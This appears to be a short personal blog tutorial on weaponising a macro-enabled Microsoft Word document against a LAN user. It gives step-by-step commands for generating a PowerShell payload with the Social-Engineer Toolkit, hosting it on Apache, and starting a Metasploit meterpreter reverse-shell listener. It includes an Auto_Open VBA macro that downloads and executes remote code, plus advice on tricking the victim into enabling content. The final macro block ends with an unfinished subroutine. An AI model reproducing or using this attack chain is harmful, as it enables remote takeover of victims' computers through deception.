MS Word Macro Exploit

1 minute read

Description:

The following is an article I read on generating an exploit for MS Word and using it to attack a LAN user.

What you will need:
Microsoft Word
The Social-Engineer Toolkit (preinstalled on Kali)
Apache web server (preinstalled on Kali)
The Metasploit Framework (also preinstalled on Kali)

To Resolve:

  1. Create the payload. On Kali, open terminal and type: setoolkit

  2. Type 1 then 9 then 1 for powershell alphanumeric shellcode injector.

  3. Fill in the LHOST variable which is your IP. This attack assumes you are on the local subnet of your victim. Then fill out the LPORT which is the port you want the attack to come back on. People typically keep this at 4444 but you can choose whatever. Type no to the start listener now.

  4. Now move the payload to your web server:

    1
    2
    
    mv /root/.set/reports/powershell/x86\_powershell\_injection.txt /var/www/html/payload.txt  
    service apache2 start
    
  5. Now we setup the listener:

    1
    2
    3
    4
    5
    6
    7
    
    msfconsole  
    use multi/handler
    
    set PAYLOAD windows/meterpreter/reverse_tcp  
    set LHOST 10.10.10.200  
    set LPORT 4444  
    exploit
    
  6. Now we need to add the command to our MS Word document:

    • Open up a blank MS Word doc and name is something like attack.docm and make sure that it is macro-enabled.

    • Go to the “View” tab => Macros => “Auto_Open” / attack.docm => Create => (paste in the following:)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    
    Sub Auto_Open()  
    Dim exec As String  
    exec = "powershell.exe ""IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt'))"""  
    Shell (exec)  
    End Sub  
    Sub AutoOpen()  
    Auto_Open  
    End Sub  
    Sub Workbook_Open()
    
    • At this point, you may want to obfuscate the code, but many people don’t even know how to get to the macro’s section of Word, much less what macro’s even are so we will skip this step. If you want to know, read the article in the reference (the source).

    • Save the document

  7. Now we need to convince the victim that the document is safe. The article references word trickery such as to open the secure document, click "Enable Content".

References:

“Create & Obfuscate a Virus Inside of a Microsoft Word Document”

Comments